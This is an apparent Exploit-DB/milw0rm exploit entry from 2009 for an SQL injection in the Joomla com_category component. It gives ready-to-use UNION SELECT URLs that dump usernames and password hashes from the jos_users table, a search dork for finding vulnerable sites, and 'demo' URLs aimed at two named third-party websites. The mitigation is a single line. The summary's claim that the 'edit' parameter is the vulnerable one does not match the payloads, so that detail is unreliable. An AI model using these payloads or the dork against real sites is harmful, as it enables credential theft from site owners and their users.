Joomla component 'com_category' SQL injection vulnerability

vendor:

Joomla

by:

Prince_Pwn3r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla

Affected Version From: 1.0.12

Affected Version To: 1.0.12

Patch Exists: NO

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla component ‘com_category’ SQL injection vulnerability

A vulnerability exists in the Joomla component 'com_category' which allows an attacker to inject arbitrary SQL commands. This is done by manipulating the 'edit' parameter in the URL. An attacker can exploit this vulnerability by sending a specially crafted URL to the vulnerable application. The URL contains an SQL query which when executed, will dump the contents of the database. Demos of the exploit can be seen in the URL http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users-- and http://teachandsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

###############################################################
# Joomla component 'com_category' SQL injection vulnerability ###########
################################################################
#version: 1.0.12###################################################
################################################################
#dork:inurl:"com_category"##########################################
# ###############################################################
# xploited by Prince_Pwn3r##########################################
################################################################
# contact: 2p0wn0rN0t2p0wn@gmail.com##############################
################################################################

+++++++ greetz to all p0wnbox.com members !!! +++++++
--------------------------------------------------------------------------------------

Vulnerable joomla component : com_category
vulnerable parameter: "edit" ($_GET)

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Exploit :


http://www.site.com/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--

Demos :

http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users--
or
http://teachandsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--

*could be different (eg: view&color=3&cat_id=)

# milw0rm.com [2009-07-11]